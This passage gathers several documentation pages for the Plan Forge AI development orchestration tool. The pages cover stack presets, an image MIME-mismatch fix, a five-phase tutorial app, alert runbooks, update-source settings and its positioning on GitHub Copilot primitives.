| Unique files | — |
| Example plan | Phase-RUST-EXAMPLE.md |
| Detection | Cargo.toml in root |
php)| Property | Value |
|---|---|
| Build | composer install |
| Test | php artisan test / phpunit |
| Framework | Laravel, Eloquent |
| Testing | PHPUnit, Pest |
| Unique files | — |
| Example plan | Phase-PHP-EXAMPLE.md |
| Detection | composer.json in root |
azure-iac)| Property | Value |
|---|---|
| Build | az bicep build / terraform validate |
| Test | az deployment group what-if / terraform plan |
| Framework | Bicep, Terraform, Azure CLI, azd |
| Testing | what-if / plan validation, Pester for PowerShell |
| Unique files | Replaces app-specific agents with: bicep-reviewer, terraform-reviewer, deploy-helper, azure-sweeper |
| Example plan | — |
| Detection | *.bicep, *.tf, or azure.yaml in root |
xAI Aurora MIME mismatch, root cause, impact, mitigations, and safe workflows.
The xAI Grok image generation API (Aurora) returns JPEG bytes regardless of the format you request. When these bytes are passed through MCP tool results with a declared media_type: "image/png", the Claude API rejects the request:
invalid_request_error: The image was specified using the image/png media type,
but the image appears to be a image/jpeg image
The generateImage() function in orchestrator.mjs has four layers of defense:
| Defense | What It Does | Code Location |
|---|---|---|
| Magic byte detection | Inspects first bytes to determine actual format (JPEG = 0xFF 0xD8 0xFF, PNG = 0x89 0x50 0x4E 0x47) |
detectImageFormat() |
| Format conversion | Uses sharp to convert to requested format when actual ≠ requested |
convertImageFormat() |
| Text-only MCP response | Tool returns type: "text" with JSON payload (file path, metadata), never raw base64 |
server.mjs handler |
| Truncated base64 | Only first 100 chars of base64 included for diagnostics, never full bytes | generateImage() return |
outputPath, image saves to disk, not returned inline.jpg extension, matches what Grok actually returns (no conversion needed)sharp is installed: cd pforge-mcp && npm install sharpcurl -X POST http://localhost:3100/api/image/generate \
-H "Content-Type: application/json" \
-d '{
"prompt": "dark fantasy forge workshop panoramic, amber firelight",
"outputPath": "docs/manual/assets/chapter-heroes/ch1-hero.webp"
}'
node -e "
import('./pforge-mcp/orchestrator.mjs').then(m =>
m.generateImage('dark fantasy forge workshop, amber firelight', {
outputPath: 'docs/manual/assets/chapter-heroes/ch1-hero.webp',
model: 'grok-imagine-image'
}).then(r => console.log(JSON.stringify(r, null, 2)))
)
"
Tested 2026-04-07:
| Test | Result | Details |
|---|---|---|
JPG direct (.jpg output) | ✓ PASS | Grok returns JPEG, saved as .jpg, no conversion. 41 KB. |
PNG conversion (.png output) | ✓ PASS | Grok returns JPEG, sharp converts to PNG, 312 KB. |
| MIME detection | ✓ PASS | detectImageFormat() correctly identified JPEG bytes. |
| MCP tool response | ✓ SAFE | Returns text-only JSON, never raw base64. |
| Session recovery | ⚠ MITIGATED | Crash only occurs if raw base64 with wrong MIME enters history. Current code prevents this. |
sharp: run cd pforge-mcp && npm ls sharp, if not installed, format conversion won't work and the extension gets corrected to .jpg instead.jpg for all generated images. It matches Grok's native output format, no conversion, no risk, fastest save.
📄 Source: pforge-mcp/orchestrator.mjs, detectImageFormat(), convertImageFormat(), generateImage()
Pick your stack. Build a real app. Learn Plan Forge by using it.
A task tracker with users, projects, tasks, statuses, and comments. Simple enough to build in an afternoon, rich enough to exercise every Plan Forge feature. You'll run the full pipeline (Specify → Harden → Execute → Review → Ship) five times, once per phase, and learn a different manual chapter with each one.
The specs below are framework-agnostic. Plan Forge generates stack-specific plans based on your preset. Pick the one you want to learn:
mkdir tracker-app && cd tracker-app
git init
# Pick your preset (replace with dotnet, typescript, python, etc.)
.\setup.ps1 -Preset <your-stack>
# Verify
.\pforge.ps1 smith
| Phase | What You Build | Manual Chapters Practiced |
|---|---|---|
| 1 | Project scaffold + GET /health | Ch 3 (Installation), Ch 4 (Your First Plan) |
| 2 | User model + JWT auth + roles | Ch 5 (Writing Plans), Ch 9 (auto-loading auth + security instructions) |
| 3 | Project & Task CRUD + tests | Ch 6 (Dashboard monitoring), Ch 7 (CLI: sweep, diff, analyze) |
| 4 | Comments + event publishing | Ch 13 (quorum mode, parallel slices, model routing) |
| 5 | Dashboard views + caching | Ch 8 (custom instructions for reporting domain) |
This is the same exercise from Chapter 6, but now in context of a larger project. Paste this into the specifier agent:
Feature: health-endpoint
Problem: The Tracker app needs a health check endpoint so load balancers
and monitoring tools can verify the service is running.
Scenarios: GET /health every 30 seconds. Returns 200 OK with
{"status": "healthy", "version": "1.0.0"}.
Acceptance Criteria:
- GET /health returns 200 with JSON body
- Response time under 50ms
- No authentication required
- If database unreachable: 503 {"status": "degraded", "reason": "database"}
Out of Scope: Deep dependency checks, metrics endpoint, custom health UI.
Run the full pipeline: Step 0 → Step 1 → Step 2 → Step 3 → Step 4 → Step 5 → Step 6. When done, pforge phase-status docs/plans/Phase-1-*.md complete.
Feature: user-authentication
Problem: The Tracker app needs user accounts with login, registration,
and role-based access control (admin, member).
MUST Criteria:
- User registration with email + password (hashed, never plaintext)
- Login returns JWT token (access + refresh)
- Role-based authorization: admin can manage all projects, member sees own
- Protected endpoints return 401 without valid token, 403 without required role
- Password reset flow (token-based)
SHOULD Criteria:
- Rate limiting on login endpoint (5 attempts per minute)
- Audit log for authentication events
Out of Scope: OAuth/social login, MFA, user profile editing.
auth.instructions.md and security.instructions.md load automatically. This is the applyTo mechanism from Chapter 2 in action.
Feature: project-task-management
Problem: Users need to create projects and manage tasks within them.
MUST Criteria:
- CRUD for Projects (create, read, update, delete)
- CRUD for Tasks within a project
- Task fields: title, description, status (todo/in-progress/done), priority (low/medium/high), assignee, due date
- Only project owner or admin can delete a project
- List tasks with filtering by status, assignee, priority
- Pagination on list endpoints (default 20 per page)
- 90%+ test coverage on service layer
SHOULD Criteria:
- Task sorting by priority, due date, created date
- Bulk status update for selected tasks
Out of Scope: File attachments, subtasks, task templates, Kanban board UI.
node pforge-mcp/server.mjs) and watch localhost:3100/dashboard during execution. You'll see slices progress in real-time, this is Chapter 7 in action.
Feature: comments-and-events
Problem: Users need to discuss tasks via comments, and the system needs
an event bus for audit/notification purposes.
MUST Criteria:
- Add, edit, delete comments on tasks
- Only comment author or admin can edit/delete
- Event publishing: task-created, task-updated, task-status-changed, comment-added
- Event consumers: update task activity log, update project last-modified timestamp
- Comments include created_at, updated_at timestamps
SHOULD Criteria:
- @mention support in comments (notify mentioned user)
- Activity feed endpoint: recent events across user's projects
Out of Scope: Real-time WebSocket push to clients, email notifications, rich text.
[P] tags to the hardened plan for parallel execution. Try --quorum=auto to see multi-model consensus on complex slices. See Chapter 14.
Feature: dashboard-and-reporting
Problem: Users need an overview of their projects with status summaries,
task distribution, and activity trends.
MUST Criteria:
- Dashboard endpoint: project count, task count by status, overdue tasks
- Per-project summary: task breakdown, recent activity, completion percentage
- Reporting endpoint: tasks completed this week/month, average time to close
- Cache dashboard data (invalidate on task/project changes)
SHOULD Criteria:
- Configurable date ranges on reports
- Export report as JSON
Out of Scope: Charts/graphs (API only), PDF export, scheduled reports.
.github/instructions/reporting.instructions.md with rules for your reporting domain (cache invalidation patterns, aggregation query patterns). This is Chapter 9 in action.
Finished all 5 phases? Try these advanced exercises:
| Exercise | What You'll Learn | Command/Chapter |
|---|---|---|
| Add multi-tenancy | Install an extension, see guardrails auto-apply | pforge ext add saas-multi-tenancy → Ch 11 |
| Add CI validation | Automate quality gates on PRs | Copy plan-forge-validate.yml → Ch 13 |
| Quorum analysis | Multi-model consistency scoring | pforge analyze --quorum docs/plans/Phase-3-*.md |
| Generate a Project Profile | Tighten guardrails based on your standards | Attach project-profile.prompt.md → Ch 8 |
| Define Project Principles | Declare non-negotiable commitments | Attach project-principles.prompt.md → Ch 8 |
| Run with a different AI tool | Test multi-agent setup | .\setup.ps1 -Agent claude → Ch 12 |
| Diagnose a bug | Multi-model bug investigation | pforge diagnose src/services/TaskService.* → Ch 7 |
📄 Based on the Tracker sample app in plan-forge-testbed. See also: greenfield-todo-api walkthrough on GitHub
The guardian fired. Here's exactly what to do next.
Every LiveGuard alert carries one of four severity levels. The matrix below defines response SLA and escalation path. Full runbooks per alert type follow.
| Severity | Response SLA | Notify | Dashboard Badge |
|---|---|---|---|
| Critical | Immediate, within 1 hour | On-call + team lead | Red badge on Triage tab |
| High | Same business day | On-call engineer | Amber badge on Triage tab |
| Medium | Next sprint | Team chat | Yellow dot on relevant tab |
| Low | Backlog | — | No badge |
Source: forge_drift_report | Typical severity: Medium–High
pforge drift to get the current score and delta. If delta > 10 points in one session, treat as High.violations[] in the output, each violation lists the file, rule, and instruction file it violates.pforge drift, score should recover to within 5 points of the previous baseline.Source: forge_secret_scan | Typical severity: Critical
git reset HEAD~1, remove the credential, re-commit.git filter-repo or BFG Repo-Cleaner to purge the secret from git history. A simple amendment is not sufficient, the old commit object still exists..forge/secrets.json (gitignored), an environment variable, or your cloud vault. Never in source code.pforge secret-scan, output should show clean: true.Source: forge_env_diff | Typical severity: Medium–High
pforge env-diff to see which keys are missing and in which files.DEBUG=true) are intentionally absent from production..env.* file with the appropriate value for that environment..env file: # NOT_IN_PROD: DEBUG.pforge env-diff, output should show clean: true or only expected gaps.Source: forge_regression_guard | Typical severity: High
pforge regression-guard to see which gates failed and their error output.git log to find which commit broke the gate. The gate command output usually points at the exact file.pforge regression-guard --plan <affected-plan>, all gates should pass.Source: forge_dep_watch | Typical severity: Medium–Critical (depends on CVE severity)
pforge dep-watch to see new vulnerabilities with their CVE IDs and severity.npm update <package> or pin to a patched version. For transitive dependencies, use npm audit fix.pforge dep-watch, the vulnerability should move from newVulnerabilities to resolvedVulnerabilities.Source: forge_alert_triage (via MTTR calculation) | Typical severity: High
pforge triage to see ranked open incidents and drift violations with their MTTR.onCall.escalation.When a LiveGuard tool fires a failure (regression, drift, incident, or secret found), forge_fix_proposal generates a scoped 1-2 slice fix plan for human review. This is the detect → propose → approve → fix loop.
pforge fix-proposal --source regression (or drift/incident/secret) after the alert fires.docs/plans/auto/LIVEGUARD-FIX-<incidentId>.md. The plan contains the failing command, affected files, and a template fix slice with <!-- TODO --> markers for you to fill in.pforge run-plan --assisted docs/plans/auto/LIVEGUARD-FIX-<incidentId>.md. The plan targets a dedicated branch, never master..forge/fix-proposals.json. Auto-generated plans in docs/plans/auto/ are gitignored, promote manually to docs/plans/ if you want to keep it in version history.forge_fix_proposal generates at most one proposal per incidentId. If the first proposal doesn’t resolve the issue, address it manually, the tool will return status: "needs-human-intervention" on the second call.
Where pforge update pulls template bytes from, and why the default changed in v2.56.0.
Before v2.56.0, pforge update had a single hard-coded source-selection rule: use the sibling clone at ../plan-forge if one existed, otherwise fail and ask for --from-github. This was optimized for contributors on their primary machine, the sibling is always on master, which is always freshly built, so contributors dogfood every change.
The trouble showed up on secondary machines: users who happened to have cloned the Plan Forge repo earlier (say, to browse the source) would later run pforge update on an unrelated project and get surprise -dev bytes from a stale master checkout. The second PC behaved differently from the first, for reasons that weren't obvious.
.forge.json now accepts an updateSource key with three values. The default, auto, picks the right thing for most people; the other two give you explicit control.
| Mode | Behavior | When to use |
|---|---|---|
auto (default) |
Picks the newer of your sibling clone and the latest GitHub tag. If the sibling is on a -dev build, GitHub wins. |
Users on any machine. Teams. Anyone who isn't actively contributing patches back to Plan Forge. |
github-tags |
Always downloads the latest tagged release from GitHub. Ignores any sibling clone even if present. | Teams that want reproducible, audited updates. CI pipelines. Pinned-dependency shops. |
local-sibling |
Always uses the sibling clone at ../plan-forge. Errors if one is missing. |
Contributors working on Plan Forge itself. You run git pull in the sibling to pick up changes. |
.forge/update-check.json) to resolve the latest tag, reads the sibling's VERSION file, and compares the two with semver precedence, any -dev pre-release loses to a clean tag. If the sibling wins or there's no network, it uses the sibling. If GitHub wins or there's no sibling, it uses the tag.
Three ways, all equivalent, they all write .forge.json.
# Read current value
pforge config get update-source
# Set it
pforge config set update-source github-tags
pforge config set update-source local-sibling
pforge config set update-source auto
# List all settable keys
pforge config list
Open the dashboard (localhost:3100/dashboard), switch to the Config tab, find the Update Source select. Your choice saves immediately, no Save button required. The hint text below the dropdown reminds you what each mode does.
.forge.json{
"preset": "dotnet",
"templateVersion": "2.56.0",
"updateSource": "auto"
}
auto ever install -dev bytes over my clean release?
No. The -dev refusal guard from v2.53.2 is still in place: if the selected source is a -dev build and your current install is clean, the update aborts with a helpful message. auto mode short-circuits this earlier by preferring the tagged release. If you explicitly set local-sibling and the sibling is -dev, you'll hit the refusal unless you pass --allow-dev.
auto mode?
If the GitHub tag lookup fails (timeout, no network, rate-limit), auto falls back to the sibling if one exists. If there's no sibling and no network, you'll get the same error you would have gotten pre-v2.56.0, run --from-github when you're back online, or set a sibling clone.
pforge self-update — does this affect it?
No. self-update is a separate command that always pulls from GitHub releases (it's designed to heal a corrupted install). updateSource only controls pforge update.
Yes, set updateSource to github-tags in your CI's .forge.json. This guarantees every CI run pulls from a specific tagged release and ignores whatever happens to be checked out in adjacent directories.
.forge.json?
No. Projects with no updateSource key default to auto, which is the recommended behavior anyway. The change is additive.
pforge update and pforge config flag list.
The thesis: GitHub ships the agent runtime + integration standards + customization primitives + engagement metrics. Everything above the runtime is the ecosystem's lane. Plan Forge is built for that lane.
Who this page is for: Engineering leaders, platform engineers, and architects evaluating a complete AI-SDLC stack, whether you've already standardized on GitHub Copilot or you're shopping the category fresh.
Companion to: What is Plan Forge? · How it works · Appendix I — Plan Forge on the GitHub Stack (the surface-by-surface technical reference).
Plan Forge + GitHub Copilot ships four capabilities no other AI-SDLC platform on the market combines today:
Six numbers every AI-SDLC programme is shopping for. Plan Forge surfaces all six on the live dashboard out of the box, no warehouse project, no BI build, no glue code.
The leading-indicator metric leadership usually asks for last, human-intervention frequency, is also captured automatically. Every time a human took over from an agent is recorded; trend lines show whether the harness is getting better or worse. See Health DNA for the full metric catalogue, or the quick reference for the complete dashboard surface.
Read top-down: outcomes you get, the harness (the orchestration layer Plan Forge provides), the substrate (GitHub Copilot's primitives) it sits on, and the GitHub platform foundation everything inherits.
The first complete AI software-development lifecycle stack: GitHub Copilot below, Plan Forge above, your outcomes on top.
Plan Forge organises into four pillars. Each card is plain English; click What's inside for the component-level detail and the manual chapter that goes deep.
Plans become slices, slices become work, work becomes audited PRs.
An idea is interviewed into a hardened plan. The plan is split into safe-sized slices. Each slice runs in its own worktree, gets reviewed by 20 specialised reviewer agents, and only ships if its validation gate passes. The platform learns from every run and builds new skills automatically.
Crucible interview funnel · Tempering quality scorer · Inner Loop competitive worktrees · Forge-Master chat-first router · 20 read-only reviewer agents · 14 slash-command skills · Reflexion retry · auto-skill library · lifecycle hooks (pre/post slice).
→ Crucible · Inner Loop · Forge-Master · Instructions & Agents · Agent Factory recipe · Multi-agent
… and more. Full surface area in the quick reference.
Context quality compounds across teams instead of being a per-repo lottery.
Three tiers: a live event stream you can watch right now, a deterministic file trail every team can audit and grep, and an optional semantic store that lets one team's lessons surface automatically when another team hits a similar problem. Lessons learned in service A become defaults in service B without anyone filing a knowledge-base article.
L1 Hub, live WebSocket events · L2 Files, .forge/ append-only audit trail · L3 OpenBrain, pgvector semantic store · cross-team federation (read-only) · bridge-and-flush durability · search_thoughts · brain_recall.
… and more. Full surface area in the quick reference.
Quality, not just adoption, the half the GitHub Metrics API doesn't cover.
Three frontier models score the same change independently and a reviewer model produces a 0–100 consensus number. Drift from your architecture is measured per commit. RCA outputs become PR proposals, not tickets. Cost is previewed before the run, not after the bill.
Quorum (Claude + GPT + Gemini) · 0–100 LLM-as-judge consensus · forge_drift_report per-commit · forge_health_trend with trajectories · forge_estimate_quorum (cancellable cost preview) · forge_fix_proposal (RCA → PR) · % code by AI · MTTR · drift score.
→ Health DNA · Self-deterministic loop · Dashboard
… and more. Full surface area in the quick reference.
Audit-grade by default. Approve from your phone. The platform reports its own bugs upstream.
Hooks fire before every deploy and after every slice. Bugs deduplicate themselves. A separate read-only watcher tails any in-flight run. When the harness itself misbehaves, it files a structured bug report against its own upstream, you're never holding the bag alone on a platform issue.
LiveGuard hooks (preDeploy / postSlice / preAgentHandoff) · Bug Registry with fingerprint dedupe · Incident Capture + MTTR · Audit Loop (scan → triage → spawn-worker fix) · forge_runbook + Deploy Journal · Remote Bridge (Slack / Teams / PagerDuty / Discord / Telegram) · Watcher (read-only by schema) · forge_meta_bug_file self-repair.
→ What is LiveGuard · LiveGuard dashboard · Audit loop · Bug registry · Watcher · Remote bridge
… and more. Full surface area in the quick reference.
Discipline matters. A platform that tries to own everything ends up owning nothing well. Plan Forge does not:
github/github-mcp-server, we use it; we ship our own MCP server only for orchestration concernsIf GitHub ships a feature that subsumes a Plan Forge capability, the right answer is to delete the Plan Forge code and use GitHub's. We're explicit about that in the project README.
Plan Forge is MIT-licensed and open source. There's no sales call, no pilot agreement, no license to procure. If you already have GitHub Copilot and GHAS, you have everything you need to evaluate the full stack against your own repos this afternoon.
github.com/srnichols/plan-forge, run setup.ps1 -Agent claude (or --agent codex / --agent cursor / --agent copilot). Generate Project Principles + initial instruction files via forge_run_skill /onboarding. Wire action.yml into GitHub Actions for PR-time gates. Walk-through: install + first plan.--worker copilot-coding-agent) for async bulk work. LiveGuard hooks if you have a deploy pipeline. The Audit Loop if you want a Coverity-style scan over an existing module. Everything is opt-in.Cost to evaluate: zero beyond your existing Copilot + GHAS subscription. No new licences, no headcount, no infrastructure, no procurement cycle. Bring your own GHCP partner relationship if you have one, Plan Forge composes on top of whatever Copilot Enterprise tier and support arrangement you already use.
Stuck? File an issue at github.com/srnichols/plan-forge/issues, or open a discussion. Plan Forge ships forge_meta_bug_file precisely so problems with the platform get reported back automatically, you're not on your own.
Architect appendix · supporting context for technical readers
On April 2, 2026, GitHub shipped the Copilot SDK in public preview. The release notes describe it as "the same production-tested agent runtime that powers GitHub Copilot cloud agent and Copilot CLI" exposed for application developers to embed.
The implication is unmistakable:
GitHub views agent orchestration as something built on top of their primitives, not inside them.
This page documents how Plan Forge composes with the primitives GitHub explicitly leaves to the ecosystem.
| Primitive | What it is | Status (May 2026) |
|---|---|---|
| Copilot Cloud Agent (formerly Coding Agent) | Ephemeral Actions-powered runner. Single repo / single branch / single PR per task. Three modes: research-only, plan-only, branch-only | GA |
| AGENTS.md | Open standard for agent context files | Stewarded by Agentic AI Foundation under the Linux Foundation. 60k+ repos use it. GitHub adopts; does not own |
| Agent Skills | Open standard for agent procedural knowledge | Repo agentskills/agentskills, Apache 2.0, maintained by Anthropic. GitHub adopts |
| Model Context Protocol (MCP) | Open standard for agent-to-tool integration | Linux Foundation project. Maintained by Anthropic et al. GitHub ships github/github-mcp-server (29.5k stars, MIT) as the reference implementation |
.github/instructions/ | GitHub-native repo customization | GA. Plan Forge ships ~18 instruction files |
.github/copilot-instructions.md | Repo-wide Copilot context | GA |
.github/agents/ | Custom agent personas | GA on github.com (preview in JetBrains/Eclipse/Xcode) |
.github/hooks/ | Lifecycle hooks (preToolUse, postToolUse, sessionStart, etc.) | GA |
.github/skills/ | Repo-scoped skill definitions | GA |
| GitHub Actions | CI/CD runtime that powers Cloud Agent | GA |
| GitHub Advanced Security (GHAS) | Code scanning, secret scanning, Dependabot | GA |
| Copilot Spaces | Curated context bundles for chat | GA (chat-side; not yet a Cloud Agent execution context) |
| Copilot Metrics API | Adoption + flow metrics (active users, PR throughput, time-to-merge) | GA |
| Copilot SDK | Embed the Cloud Agent runtime in your own app | Public preview, April 2, 2026 |
| Custom properties | Org-level governance primitive | GA |
| Org runner controls + firewall | Cloud Agent runtime governance | GA (April 2026) |
This is a strong, coherent substrate. It is also explicitly just the substrate.
These are the surfaces GitHub does not ship and shows no sign of shipping, direct evidence from GitHub's own docs and roadmap:
| Gap | Evidence |
|---|---|
| Hardened plan as versioned artifact with scope contract, slices, validation gates, drift detection | Plan-mode is session-scoped one-shot; no plan file format, no scope contract, no slice persistence |
| Cross-repo / multi-service orchestration | Explicit single-repo limitation: "Copilot can only make changes in the repository specified when you start a task. Copilot cannot make changes across multiple repositories in one run." |
| Multi-model quorum / consensus per task | No built-in mechanism. Single model per session |
| Plan execution harness with per-slice gates and resume-from semantics | copilot-setup-steps.yml is one pre-flight hook; nothing slice-aware |
| Semantic eval harness (test pass rate, regression rate, plan-adherence) | Metrics API explicitly does not measure quality, only adoption + flow |
| Cost prediction per task / per plan before execution | Only post-hoc Actions + premium-request totals |
| Live programmatic watch of an in-flight agent from external tools | Session UI is in-product only; no public stream |
| Cross-org / cross-team fleet console with queue, capacity, SLA visibility | Only per-issue / per-project session UI |
| Pre-merge plan-adherence gates | No first-party concept of "this PR drifted from the approved plan" |
| Agent skills / instructions sync across N repos | Up to consumer (.github-private is the only template mechanism) |
| Multi-tenant cost budgets and prioritization | Not in product |
| A/B comparison of custom agents or models for the same task class | Not in product |
| Cross-team / cross-project semantic memory so lessons compound across pilots | Copilot Spaces is chat-side and repo-scoped; no semantic recall across teams or sessions |
| Closed-loop RCA → fix-proposal → validate-fix pipeline | @copilot on issues + GHAS Autofix are open-loop point features; no native bug registry, no multi-model RCA, no fix validation cycle |
| Coverity-style scan → triage → spawn-worker → fix loop for AI-generated drift | GHAS scans + Autofix on findings only; nothing that spawns a worker per finding and iterates to convergence |
| Deploy-aware lifecycle hooks (preDeploy / postSlice / preAgentHandoff) with severity gates | Existing hooks (preToolUse / postToolUse / sessionStart) are session-scoped; nothing fires before deploys with severity blocking |
| Idea → hardened-plan interview funnel with lane-scoped Q&A | Plan-mode is single-shot session output; no interview funnel, no lane classification, no progressive refinement |
| Pre-flight plan-quality scorer (scope-contract clarity, slice sizing, gate strength, forbidden-actions) | Nothing in product scores plan quality before execution |
| Specialized reviewer agent fleet (20+ read-only personas: arch / security / db / perf / a11y / multi-tenancy / CI-CD / compliance / dependency / observability) | Copilot Code Review is singular and chat-prompted; no first-party persona library |
| Remote-bridge approval flows with resume-on-approve (Slack / Teams / PagerDuty / Telegram / Discord) | GitHub notifications fire one-way; no inline-approve → resume-paused-slice flow |
| Deploy Journal + auto-generated runbook per plan | No first-party concept of "audit record per deploy" or "runbook from this plan" |
| … and more. The full capability index lives in the quick reference and the manual book index. | |
GitHub's positioning is consistent: wrap your tool/data source as an MCP server, layer your customization via the open file standards (AGENTS.md, Skills, instructions), and build your orchestration on top of the SDK. That is exactly the Plan Forge architecture.
A 16-row reference for architects mapping each GitHub-native primitive to the Plan Forge surface that consumes it. Click to expand.
| GitHub primitive | How Plan Forge consumes it | Where in Plan Forge |
|---|---|---|
| Copilot Cloud Agent | Plan Forge dispatches plan slices to CCA via gh issue create --assignee @copilot. Trajectories captured to .forge/trajectories/<plan-slug>.jsonl | pforge-mcp/orchestrator.mjs (--worker copilot-coding-agent mode) |
| AGENTS.md | Plan Forge generates and maintains AGENTS.md alongside .github/copilot-instructions.md so any AGENTS.md-aware agent (Claude Code, Cursor, Codex, Amp, Aider, Gemini CLI, Goose, Windsurf) consumes Plan Forge context | pforge-mcp/server.mjs setup phase |
.github/instructions/ | Plan Forge ships ~18 instruction files covering architecture, security, testing, database, API, auth, error handling, deployment, performance, observability, version, status reporting, context fuel, self-repair, plan hardening | templates/.github/instructions/ |
.github/copilot-instructions.md | Plan Forge generates the project-scoped Copilot instructions during setup.ps1 / setup.sh | setup.ps1, setup.sh |
.github/agents/ | Plan Forge ships 20 custom agent personas (architecture, database, security, deploy, performance, test-runner, API contracts, accessibility, multi-tenancy, CI/CD, observability, dependency, compliance, plus 6 pipeline agents and an audit classifier) | templates/.github/agents/ |
.github/hooks/ | Plan Forge ships its own lifecycle hooks: PreDeploy, PreCommit, PreAgentHandoff, PostSlice, plus plan-forge.json hook configuration. Distinct from Claude Code's hook names. | templates/.github/hooks/ |
.github/skills/ | Plan Forge ships 11 skills as / slash-commands: database-migration, staging-deploy, test-sweep, dependency-audit, security-audit, code-review, release-notes, api-doc-gen, onboarding, health-check, forge-execute, audit-loop, plus pipeline skills | templates/.github/skills/ |
| MCP | Plan Forge ships its own MCP server (pforge-mcp) with 102 tools covering planning, execution, eval, observability, cost, memory, search, timeline, notifications. Auto-generates .vscode/mcp.json | pforge-mcp/server.mjs, pforge-mcp/tools.json |
github/github-mcp-server | Plan Forge documents this as the canonical GitHub-side MCP integration. Plan Forge agents call it via the MCP plumbing they already speak | docs reference, .vscode/mcp.json example |
| GitHub Actions | Plan Forge plans can run as Actions workflows; pforge run-plan is callable from any runner. CCA itself runs in Actions and Plan Forge plans dispatched via CCA inherit Actions concurrency, runners, and minutes | action.yml |
| GitHub Advanced Security | Plan Forge's forge_secret_scan, forge_dep_watch, and security-audit skill complement GHAS, not replace it. Plan Forge surfaces GHAS findings into plan-aware bug reports | pforge-mcp/notifications/, dependency-reviewer.agent.md |
| Copilot Spaces | Plan Forge plan files + Scope Contract are the equivalent concept for autonomous execution. Spaces serves chat-side context curation; Plan Forge serves execution-time scope binding | docs reference |
| Copilot Metrics API | Plan Forge does not duplicate it. Plan Forge surfaces quality metrics (gate failure rates, drift scores, plan-adherence, regressions caught at gate boundary, cost per merged PR) that the Metrics API explicitly does not | forge_health_trend, forge_drift_report, forge_cost_report |
| Copilot SDK | Plan Forge does not embed the Copilot runtime. Plan Forge orchestrates across multiple agent runtimes (CCA, Claude Code, Codex, custom workers). The SDK is the right tool when you want to embed a single agent in your app; Plan Forge is the right tool when you want to coordinate many agent runs as a delivery pipeline | architecture reference |
| Custom properties | Plan Forge documents the recommended custom-property schema for governing per-team Plan Forge enablement, plan templates, and budget caps | templates/docs/CUSTOMIZATION.md |
| Org runner controls | Plan Forge dispatched plans inherit the org's runner policy. No conflict, no override needed | docs reference |
If your strategic direction is "consolidate on GitHub Enterprise + Copilot Enterprise," Plan Forge reinforces that choice rather than competing with it.
For Microsoft-shop enterprises pursuing the GitHub-native consolidation thesis, this is the cleanest path: GitHub for the substrate, Plan Forge for the orchestration layer, no third vendor in the picture.
For customers using Microsoft Foundry (Azure OpenAI, Foundry Agent Service, Foundry Toolboxes), Plan Forge composes additionally with:
https://{resource}.openai.azure.com/openai/v1/. Customer configures deployment names, not model families..vscode/mcp.json at a Foundry Toolbox endpoint is config, not code.See Reference Architecture — Microsoft Foundry variant for the full picture.
If the four pillars and the picture earned a closer look, jump straight to the chapters that go deep. Grouped for shoppers, builders, and operators.
… and more. Browse the full manual book index or the quick reference for everything.

A tour of the GitHub-native primitives Plan Forge integrates with, plus the readiness check for your repo.
When to read this chapter: you are running (or considering) Plan Forge against a repository hosted on GitHub, with GitHub Copilot, Copilot Coding Agent, GHAS, or Copilot Spaces in the picture.
When to skip it: you are on Bitbucket, GitLab, Azure DevOps, or anywhere else. None of this is required by Plan Forge, see Appendix C: Stack-Specific Notes for language-preset details, and Chapter 12: Extensions for the OSS extension surface.
Looking for the strategic framing instead? See Appendix H — GitHub Stack Alignment for the four-band AI SDLC stack diagram, the four harness pillars in plain English, the six outcome KPIs, and the consolidation thesis. This appendix (I) is the surface-by-surface technical reference; H is the executive-level companion.
Plan Forge does not require GitHub. It runs against any repo, with any agent (Copilot, Claude Code, Cursor, Codex), and against any CI system. But when the repo is on GitHub, Plan Forge has the deepest stack of integrations, eight first-class primitives it consumes today, plus several it dispatches to. This appendix is the single canonical reference for that integration surface.
Section 1 is the readiness check, a one-command snapshot of which GitHub primitives your repo currently has wired up. Section 2 is the surface-by-surface tour. Sections 3 (Copilot Coding Agent dispatch), 4 (GHAS remediation chains), 5 (Copilot Spaces sync), 6 (Metrics API leaderboard), 7 (BYOK and the multi-model picker), and 8 (other agent platforms: Claude Code, Cursor, Codex) are now live.
pforge github statusThe fastest way to know which GitHub-native primitives Plan Forge can use against your repo is the introspection command:
pforge github status
Output is a checklist of the eight default checks, each marked with a glyph:
Sample output, run against the Plan Forge repository itself:
GitHub stack readiness, E:\GitHub\Plan Forge
────────────────────────────────────────────────────────────────────────
✓ .github/copilot-instructions.md
present
⚠ AGENTS.md
missing, open agent standard not adopted
✓ .github/instructions/*.instructions.md
7 instruction files found
✓ .github/prompts/*.prompt.md
8 prompt files found
✓ .vscode/mcp.json
Plan Forge MCP server registered
✓ .github/workflows/
4 workflow files found
✓ git remote → github.com
github.com remote configured
✓ gh CLI on PATH
gh CLI available
────────────────────────────────────────────────────────────────────────
7 pass · 1 warn · 0 fail · 0 n/a (8 checks)
And against the Plan Forge testbed (a sample repo set up via setup.ps1):
pforge github status against the Plan Forge testbed, generated by scripts/capture-github-status-screenshot.mjs.To get fix hints for every ⚠ and ✗ row, use the doctor subcommand:
pforge github doctor
For machine-readable output (e.g. piping into a dashboard or another tool), add --json:
pforge github status --json
The JSON shape is stable and documented in the MCP Server Reference under forge_github_status. Two extra SHOULD-tier checks (instruction-file applyTo: usage, copilot-instructions length) run when you add --extra.
| Code | Meaning |
|---|---|
0 | No ✗ fail rows. Warns and N/A are allowed. |
1 | At least one ✗ fail row. |
2 | Invalid arguments to the CLI. |
This makes the command CI-friendly: a workflow can fail-fast on missing primitives, or treat warnings as advisory only.
The same checklist is exposed as the forge_github_status MCP tool. From an in-IDE chat:
"Run
forge_github_statuson this repo and tell me which GitHub primitives I'm missing."
The agent receives the structured JSON and can answer with line-level precision, useful when you're evaluating Plan Forge inside an existing repo and don't want to leave the IDE.
Each row below is one check from pforge github status. The "What Plan Forge does with it" column is what makes this chapter different from the GitHub docs: it tells you exactly how Plan Forge uses the primitive, and which Plan Forge feature stops working if you remove it.
| Primitive | What it is | What Plan Forge does with it |
|---|---|---|
.github/copilot-instructions.md |
Repo-wide context Copilot Chat reads on every conversation. | Generated by setup.ps1 / setup.sh. Plan Forge writes the project overview, architecture summary, quick-command reference, and pipeline reference here. Re-generated by pforge update while preserving customizations. |
AGENTS.md |
Open standard adopted by Cursor, Codex, OpenAI, Anthropic, and GitHub for cross-agent context. | Generated alongside copilot-instructions.md. Lets Plan Forge support BYOK, the same context surface works whether the user picks Copilot, Cursor, Claude Code, or Codex. |
.github/instructions/*.instructions.md |
Path-scoped Copilot instructions (each file's applyTo: frontmatter targets a glob). |
